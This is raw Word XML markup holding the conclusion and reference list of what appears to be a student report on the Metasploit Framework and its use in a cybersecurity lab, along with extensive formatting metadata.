    <w:p w14:paraId="7B45778A" w14:textId="0F2B9AF1" w:rsidR="00690B21" w:rsidRDefault="00AC25FA" w:rsidP="00796962">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF721CF" w14:textId="48A228D7" w:rsidR="008B795C" w:rsidRDefault="00CE4617" w:rsidP="00FF26B8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B116C6E" w14:textId="303ACE99" w:rsidR="0044528E" w:rsidRDefault="0044528E" w:rsidP="0044528E"/>
    <w:p w14:paraId="365D86A3" w14:textId="0A462DD2" w:rsidR="005D4288" w:rsidRDefault="00794B27" w:rsidP="00D74352">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The MSF </w:t>
      </w:r>
      <w:r w:rsidR="00F1014D">
        <w:t xml:space="preserve">is a very powerful tool that </w:t>
      </w:r>
      <w:r w:rsidR="005D4288">
        <w:t xml:space="preserve">has </w:t>
      </w:r>
      <w:r w:rsidR="00821608">
        <w:t xml:space="preserve">far </w:t>
      </w:r>
      <w:r w:rsidR="003D745A">
        <w:t>more</w:t>
      </w:r>
      <w:r w:rsidR="005D4288">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AC6E3D">
        <w:t xml:space="preserve">functionality </w:t>
      </w:r>
      <w:r w:rsidR="005D4288">
        <w:t>tha</w:t>
      </w:r>
      <w:r w:rsidR="003D745A">
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="005D4288">
        <w:t xml:space="preserve"> could </w:t>
      </w:r>
      <w:r w:rsidR="003D745A">
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="005D4288">
        <w:t>covered in this</w:t>
      </w:r>
      <w:r w:rsidR="00AC6E3D">
        <w:t xml:space="preserve"> single</w:t>
      </w:r>
      <w:r w:rsidR="005D4288">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F1014D">
        <w:t>report</w:t>
      </w:r>
      <w:r w:rsidR="00AC6E3D">
        <w:t>.  T</w:t>
      </w:r>
      <w:r w:rsidR="00ED3E5B">
        <w:t xml:space="preserve">he MSF is an </w:t>
      </w:r>
      <w:r w:rsidR="00F1014D">
        <w:t>open-source</w:t>
      </w:r>
      <w:r w:rsidR="00ED3E5B">
        <w:t xml:space="preserve"> product </w:t>
      </w:r>
      <w:r w:rsidR="00AC6E3D">
        <w:t xml:space="preserve">that </w:t>
      </w:r>
      <w:r w:rsidR="009768E5">
        <w:t xml:space="preserve">cybersecurity experts are continually working on </w:t>
      </w:r>
      <w:r w:rsidR="00AC6E3D">
        <w:t xml:space="preserve">to add </w:t>
      </w:r>
      <w:r w:rsidR="009768E5">
        <w:t>additional feature</w:t>
      </w:r>
      <w:r w:rsidR="00F81E31">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00E65552">
        <w:t xml:space="preserve"> and tools</w:t>
      </w:r>
      <w:r w:rsidR="00AC6E3D">
        <w:t xml:space="preserve"> to improve its capabilities</w:t>
      </w:r>
      <w:r w:rsidR="009B1289">
        <w:t xml:space="preserve"> so the MSF will </w:t>
      </w:r>
      <w:r w:rsidR="00F81E31">
        <w:t>continue to grow in future.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9EFFBF" w14:textId="14EF446F" w:rsidR="006A624F" w:rsidRDefault="00D01371" w:rsidP="00D74352">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">It is appreciated that this tool is invaluable for penetration testers and provides a whole host of </w:t>
      </w:r>
      <w:r w:rsidR="00DA3148">
        <w:t xml:space="preserve">features that </w:t>
      </w:r>
      <w:r w:rsidR="00771D62">
        <w:t xml:space="preserve">can be used to improve cybersecurity </w:t>
      </w:r>
      <w:r w:rsidR="00595F3C">
        <w:t xml:space="preserve">for their customers.  On the other hand, </w:t>
      </w:r>
      <w:r w:rsidR="00EC48B5">
        <w:t xml:space="preserve">it </w:t>
      </w:r>
      <w:r w:rsidR="00A108C7">
        <w:t>is evident</w:t>
      </w:r>
      <w:r w:rsidR="00EC48B5">
        <w:t xml:space="preserve"> that this tool could be used for malicious </w:t>
      </w:r>
      <w:r w:rsidR="00D74352">
        <w:t>purposes and</w:t>
      </w:r>
      <w:r w:rsidR="009064AE">
        <w:t xml:space="preserve"> could potentially cause a lot of damage in the wrong hands. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D72BB91" w14:textId="4ECD6788" w:rsidR="00C321E5" w:rsidRDefault="00B23E69" w:rsidP="00D74352">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">To become a Cybersecurity Engineer, it can be seen from </w:t>
      </w:r>
      <w:r w:rsidR="00E74B98">
        <w:t xml:space="preserve">my research and </w:t>
      </w:r>
      <w:r>
        <w:t>th</w:t>
      </w:r>
      <w:r w:rsidR="00E74B98">
        <w:t>e lab</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> exercise </w:t>
      </w:r>
      <w:r w:rsidR="00E74B98">
        <w:t xml:space="preserve">that having in depth knowledge of the MSF is crucial. </w:t>
      </w:r>
      <w:r w:rsidR="00BF638F">
        <w:t xml:space="preserve">To obtain the level of knowledge required it is intended that </w:t>
      </w:r>
      <w:r w:rsidR="00BE6715">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00123008">
        <w:t>SF</w:t>
      </w:r>
      <w:r w:rsidR="00BE6715">
        <w:t xml:space="preserve"> will be used as part of the assignment </w:t>
      </w:r>
      <w:r w:rsidR="004B13AF">
        <w:t xml:space="preserve">for this module. </w:t>
      </w:r>
      <w:r w:rsidR="00E42175">
        <w:t xml:space="preserve"> As a</w:t>
      </w:r>
      <w:r w:rsidR="007D7E5B">
        <w:t xml:space="preserve"> continu</w:t>
      </w:r>
      <w:r w:rsidR="005B50C5">
        <w:t>ation</w:t>
      </w:r>
      <w:r w:rsidR="007D7E5B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B50C5">
        <w:t>of</w:t>
      </w:r>
      <w:r w:rsidR="007D7E5B">
        <w:t xml:space="preserve"> this introductory </w:t>
      </w:r>
      <w:r w:rsidR="00E905DB">
        <w:t>report t</w:t>
      </w:r>
      <w:r w:rsidR="004B13AF">
        <w:t xml:space="preserve">he next step is to install </w:t>
      </w:r>
      <w:r w:rsidR="007D7E5B">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="004B13AF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001523EA">
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="004B13AF">
        <w:t>etasploitable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007D7E5B">
        <w:t xml:space="preserve"> device in the virtual environment </w:t>
      </w:r>
      <w:r w:rsidR="00E905DB">
        <w:t>within the cybersecurity lab</w:t>
      </w:r>
      <w:r w:rsidR="00E42175">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C6427">
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="00E42175">
        <w:t xml:space="preserve"> carry out further testing</w:t>
      </w:r>
      <w:r w:rsidR="005C6427">
        <w:t xml:space="preserve"> of the MSF</w:t>
      </w:r>
      <w:r w:rsidR="00E42175">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BB35E8" w14:textId="7040D8ED" w:rsidR="00564FED" w:rsidRDefault="00D414BC" w:rsidP="00D414BC">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Table of Reference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32318833"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Bibliographies"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtContent>
        <w:p w14:paraId="46778FCE" w14:textId="57C02274" w:rsidR="00D06E44" w:rsidRDefault="00D06E4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EA6BAE0" w14:textId="77777777" w:rsidR="00603060" w:rsidRDefault="00D06E44">
              <w:pPr>
                <w:rPr>
                  <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
                  <w:noProof/>
                  <w:lang w:eastAsia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603060" w14:paraId="757CDCA1" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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8FA59E" w14:textId="58D641CA" w:rsidR="00603060" w:rsidRDefault="00603060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D18233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Rapid 7, “Metaspoit Penetration Testing Software,” 2 November 2023. [Online]. Available: https://www.rapid7.com/products/metasploit/.</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="19B13157" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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29014D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23C7B5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Rapid 7, “Vulnerability Scanning with Nexpose,” Rapid 7, TBC TBC TBC. [Online]. Available: https://docs.rapid7.com/metasploit/vulnerability-scanning-with-nexpose/. [Accessed 5 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="2DE5CE76" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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BE8E21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5F5251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Rapid 7, “Metasploit Editions1; Network Pen Testing Tools,” Rapid 7, TBC TBC TBC. [Online]. Available: https://www.rapid7.com/products/metasploit/download/editions/. [Accessed 5 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="69015364" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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2E40F5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7EEAC4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Offsec.com, “Metasploit Unleashed,” Offsec.com, TBC TBC TBC. [Online]. Available: https://www.offsec.com/metasploit-unleashed/. [Accessed 2 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="3746CCDD" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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E91CA2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FC75F9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Lockheed Martin, “Cyber Kill Chain,” Lockheed Martin, TBC TBC TBC. [Online]. Available: https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html. [Accessed 2 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="13D8B8D1" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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2E1A6B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B8566F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Rapid 7, “Metasploit Documentation Penetration Testing Software,” Rapid 7, TBC TBC TBC. [Online]. Available: https://docs.metasploit.com/docs/modules.html. [Accessed 2 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="381A0AD9" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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36F141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D247D1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Cisco, “Security Configuration Guide Access Control Lists,” Cisco, 2 April 2014. [Online]. Available: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_data_acl/configuration/15-mt/sec-data-acl-15-mt-book/sec-cfg-ip-filter.html. [Accessed 4 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="3EE823C5" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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1EEC37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58DB76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NCSC, “Incident Managment,” National Cybersecurity Centre, TBC TBC TBC. [Online]. Available: https://www.ncsc.gov.uk/collection/incident-management/cyber-incident-response-processes. [Accessed 5 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
              <w:tr w:rsidR="00603060" w14:paraId="7C688AC7" w14:textId="77777777">
                <w:trPr>
                  <w:divId w:val="12504280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B1179A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E36363" w14:textId="77777777" w:rsidR="00603060" w:rsidRDefault="006030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Kali.org, “Matasploit-Framewark,” Kali.org, 17 August 2023. [Online]. Available: https://www.kali.org/tools/metasploit-framework/. [Accessed 2 November 2023].</w:t>
                    </w:r>
                  </w:p>
                </w:tc>
              </w:tr>
            </w:tbl>
            <w:p w14:paraId="51A0EEE0" w14:textId="77777777" w:rsidR="00603060" w:rsidRDefault="00603060">
              <w:pPr>
                <w:divId w:val="1250428069"/>
                <w:rPr>
                  <w:rFonts w:eastAsia="Times New Roman"/>
                  <w:noProof/>
                </w:rPr>
              </w:pPr>
            </w:p>
            <w:p w14:paraId="73D4B663" w14:textId="65FA8B55" w:rsidR="00D06E44" w:rsidRDefault="00D06E4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FCE4432" w14:textId="77777777" w:rsidR="00D414BC" w:rsidRPr="00D414BC" w:rsidRDefault="00D414BC" w:rsidP="00D414BC"/>
    <w:sectPr w:rsidR="00D414BC" w:rsidRPr="00D414BC" w:rsidSect="00B63D7C">
      <w:headerReference w:type="even" r:id="rId32"/>
      <w:headerReference w:type="default" r:id="rId33"/>
      <w:footerReference w:type="even" r:id="rId34"/>
      <w:footerReference w:type="default" r:id="rId35"/>
      <w:headerReference w:type="first" r:id="rId36"/>
      <w:footerReference w:type="first" r:id="rId3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95A533" w14:textId="77777777" w:rsidR="0069762D" w:rsidRDefault="0069762D" w:rsidP="00F63911">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="00281171" w14:textId="77777777" w:rsidR="0069762D" w:rsidRDefault="0069762D" w:rsidP="00F639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028377" w14:textId="77777777" w:rsidR="007F7746" w:rsidRDefault="007F774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8E4712" w14:textId="77777777" w:rsidR="003E1CB6" w:rsidRDefault="003E1CB6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056E3A73" w14:textId="77777777" w:rsidR="003E1CB6" w:rsidRDefault="003E1CB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14771C" w14:textId="77777777" w:rsidR="007F7746" w:rsidRDefault="007F77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DFD414" w14:textId="77777777" w:rsidR="0069762D" w:rsidRDefault="0069762D" w:rsidP="00F63911">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="5AD67D9D" w14:textId="77777777" w:rsidR="0069762D" w:rsidRDefault="0069762D" w:rsidP="00F6391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0D2EAE" w14:textId="77777777" w:rsidR="007F7746" w:rsidRDefault="007F774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B89B02" w14:textId="77777777" w:rsidR="007F7746" w:rsidRDefault="007F774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2D3CC3" w14:textId="77777777" w:rsidR="007F7746" w:rsidRDefault="007F774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572C26"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CCE611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19508A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="03EAA5A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A465968"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3E08432"/>
    <w:lvl w:ilvl="0" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="1800" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2520" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3240" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="FFFFFFFF">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FFFFFFFF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4A341C9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D5FA7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DB237A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3EE4FC54"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="2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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="3CF714EF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="924C0D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89242C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E3E08432"/>
    <w:lvl w:ilvl="0" w:tplc="E55C99F2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="720"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="D2D604CE">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="72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>
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3960" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="08090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4680" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0809001B">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="5400" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="0809000F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6120" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="08090019">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6840" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="0809001B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5C7B2489"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0300867E"/>
    <w:lvl w:ilvl="0" w:tplc="7882AC82">
      <w:start w:val="9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75093836"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="73AE43E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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A1C495D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5B16F0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34517445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269434392">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1045904761">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1885097710">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="672682797">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="835615194">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="594174525">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1984188117">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1897355773">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="591623131">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="83731289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BDC"/>
    <w:rsid w:val="00003D67"/>
    <w:rsid w:val="00004173"/>
    <w:rsid w:val="00010F60"/>
    <w:rsid w:val="00014CE9"/>
    <w:rsid w:val="000410DB"/>
    <w:rsid w:val="00042556"/>
    <w:rsid w:val="00046E7E"/>
    <w:rsid w:val="0005565E"/>
    <w:rsid w:val="00056112"/>
    <w:rsid w:val="0005780B"/>
    <w:rsid w:val="00066099"/>
    <w:rsid w:val="00067FAB"/>
    <w:rsid w:val="000712C4"/>
    <w:rsid w:val="00072BBA"/>
    <w:rsid w:val="000730E5"/>
    <w:rsid w:val="00074A9D"/>
    <w:rsid w:val="0007623B"/>
    <w:rsid w:val="00081C23"/>
    <w:rsid w:val="0008447B"/>
    <w:rsid w:val="00091451"/>
    <w:rsid w:val="000A0897"/>
    <w:rsid w:val="000A0A6E"/>
    <w:rsid w:val="000A4277"/>
    <w:rsid w:val="000B4EC6"/>
    <w:rsid w:val="000B4EED"/>
    <w:rsid w:val="000B4F47"/>
    <w:rsid w:val="000B5071"/>
    <w:rsid w:val="000B5413"/>
    <w:rsid w:val="000B7D92"/>
    <w:rsid w:val="000C658A"/>
    <w:rsid w:val="000D07EA"/>
    <w:rsid w:val="000D2D86"/>
    <w:rsid w:val="000D596B"/>
    <w:rsid w:val="000D673D"/>
    <w:rsid w:val="000E09B9"/>
    <w:rsid w:val="000E1C5F"/>
    <w:rsid w:val="000F520C"/>
    <w:rsid w:val="000F5A62"/>
    <w:rsid w:val="000F5B39"/>
    <w:rsid w:val="001017DC"/>
    <w:rsid w:val="00102A0E"/>
    <w:rsid w:val="001055A1"/>
    <w:rsid w:val="0011024B"/>
    <w:rsid w:val="00112852"/>
    <w:rsid w:val="00114D6C"/>
    <w:rsid w:val="001155D8"/>
    <w:rsid w:val="00115AB0"/>
    <w:rsid w:val="00123008"/>
    <w:rsid w:val="0013188F"/>
    <w:rsid w:val="00134263"/>
    <w:rsid w:val="00136E26"/>
    <w:rsid w:val="00141050"/>
    <w:rsid w:val="00142734"/>
    <w:rsid w:val="00145002"/>
    <w:rsid w:val="00151259"/>
    <w:rsid w:val="00151656"/>
    <w:rsid w:val="001523EA"/>
    <w:rsid w:val="00152D56"/>
    <w:rsid w:val="0015494C"/>
    <w:rsid w:val="001570F4"/>
    <w:rsid w:val="00157DC5"/>
    <w:rsid w:val="00161DF2"/>
    <w:rsid w:val="00167ED3"/>
    <w:rsid w:val="0017760E"/>
    <w:rsid w:val="0018265A"/>
    <w:rsid w:val="00183C1B"/>
    <w:rsid w:val="00184397"/>
    <w:rsid w:val="0018544B"/>
    <w:rsid w:val="001858F3"/>
    <w:rsid w:val="00190C55"/>
    <w:rsid w:val="00196B52"/>
    <w:rsid w:val="001A1809"/>
    <w:rsid w:val="001A2CA6"/>
    <w:rsid w:val="001A2D9E"/>
    <w:rsid w:val="001A7FC6"/>
    <w:rsid w:val="001B41AE"/>
    <w:rsid w:val="001B57F7"/>
    <w:rsid w:val="001C584A"/>
    <w:rsid w:val="001C68CE"/>
    <w:rsid w:val="001E23D9"/>
    <w:rsid w:val="001E785B"/>
    <w:rsid w:val="001F08F1"/>
    <w:rsid w:val="001F1824"/>
    <w:rsid w:val="001F58C1"/>
    <w:rsid w:val="002054F3"/>
    <w:rsid w:val="00205630"/>
    <w:rsid w:val="002113F9"/>
    <w:rsid w:val="00212445"/>
    <w:rsid w:val="00213D61"/>
    <w:rsid w:val="002164C6"/>
    <w:rsid w:val="00216A4D"/>
    <w:rsid w:val="00217F6D"/>
    <w:rsid w:val="00220160"/>
    <w:rsid w:val="00220FDE"/>
    <w:rsid w:val="002227FF"/>
    <w:rsid w:val="002257F1"/>
    <w:rsid w:val="00226A4C"/>
    <w:rsid w:val="00226B76"/>
    <w:rsid w:val="0023237C"/>
    <w:rsid w:val="002507DC"/>
    <w:rsid w:val="0025489F"/>
    <w:rsid w:val="0025567A"/>
    <w:rsid w:val="00255AC9"/>
    <w:rsid w:val="00256791"/>
    <w:rsid w:val="00265E48"/>
    <w:rsid w:val="00272184"/>
    <w:rsid w:val="002744D4"/>
    <w:rsid w:val="00280B0E"/>
    <w:rsid w:val="002820F2"/>
    <w:rsid w:val="002826BF"/>
    <w:rsid w:val="00285F32"/>
    <w:rsid w:val="00294C9A"/>
    <w:rsid w:val="002961DE"/>
    <w:rsid w:val="00296E02"/>
    <w:rsid w:val="0029724D"/>
    <w:rsid w:val="002A0D88"/>
    <w:rsid w:val="002A0F00"/>
    <w:rsid w:val="002A5B9A"/>
    <w:rsid w:val="002A71EA"/>
    <w:rsid w:val="002B04D6"/>
    <w:rsid w:val="002B0DB1"/>
    <w:rsid w:val="002B6D01"/>
    <w:rsid w:val="002B7E13"/>
    <w:rsid w:val="002C0780"/>
    <w:rsid w:val="002C09A8"/>
    <w:rsid w:val="002C60D2"/>
    <w:rsid w:val="002C7CD7"/>
    <w:rsid w:val="002D0778"/>
    <w:rsid w:val="002D3F40"/>
    <w:rsid w:val="002D7FB7"/>
    <w:rsid w:val="002E08D5"/>
    <w:rsid w:val="002F547B"/>
    <w:rsid w:val="00300DA5"/>
    <w:rsid w:val="00305F9C"/>
    <w:rsid w:val="003062B2"/>
    <w:rsid w:val="0031172A"/>
    <w:rsid w:val="00312586"/>
    <w:rsid w:val="00323522"/>
    <w:rsid w:val="003244B0"/>
    <w:rsid w:val="003253FA"/>
    <w:rsid w:val="00325578"/>
    <w:rsid w:val="00326431"/>
    <w:rsid w:val="003342CE"/>
    <w:rsid w:val="00335989"/>
    <w:rsid w:val="003408B1"/>
    <w:rsid w:val="003409B6"/>
    <w:rsid w:val="00343B05"/>
    <w:rsid w:val="00345ECB"/>
    <w:rsid w:val="00346ACC"/>
    <w:rsid w:val="00352B03"/>
    <w:rsid w:val="00367241"/>
    <w:rsid w:val="0037324A"/>
    <w:rsid w:val="00373B2D"/>
    <w:rsid w:val="00375290"/>
    <w:rsid w:val="003801F1"/>
    <w:rsid w:val="00381365"/>
    <w:rsid w:val="00381903"/>
    <w:rsid w:val="00381FD8"/>
    <w:rsid w:val="00383106"/>
    <w:rsid w:val="00383B7C"/>
    <w:rsid w:val="00391082"/>
    <w:rsid w:val="00394DCF"/>
    <w:rsid w:val="00397C05"/>
    <w:rsid w:val="003A0404"/>
    <w:rsid w:val="003A1B09"/>
    <w:rsid w:val="003A5DB5"/>
    <w:rsid w:val="003A7552"/>
    <w:rsid w:val="003B1598"/>
    <w:rsid w:val="003B2E58"/>
    <w:rsid w:val="003B482C"/>
    <w:rsid w:val="003B5DDB"/>
    <w:rsid w:val="003B7C9D"/>
    <w:rsid w:val="003C5836"/>
    <w:rsid w:val="003C5CD5"/>
    <w:rsid w:val="003C686E"/>
    <w:rsid w:val="003D09F3"/>
    <w:rsid w:val="003D0D70"/>
    <w:rsid w:val="003D3338"/>
    <w:rsid w:val="003D5578"/>
    <w:rsid w:val="003D676F"/>
    <w:rsid w:val="003D745A"/>
    <w:rsid w:val="003D77B8"/>
    <w:rsid w:val="003D7BCF"/>
    <w:rsid w:val="003E1CB6"/>
    <w:rsid w:val="003E38CD"/>
    <w:rsid w:val="003E64C7"/>
    <w:rsid w:val="003F1E2E"/>
    <w:rsid w:val="003F229B"/>
    <w:rsid w:val="003F2B33"/>
    <w:rsid w:val="003F516B"/>
    <w:rsid w:val="00403E0B"/>
    <w:rsid w:val="004060F9"/>
    <w:rsid w:val="00406136"/>
    <w:rsid w:val="00407646"/>
    <w:rsid w:val="004116FD"/>
    <w:rsid w:val="00413E33"/>
    <w:rsid w:val="00414013"/>
    <w:rsid w:val="00421E6D"/>
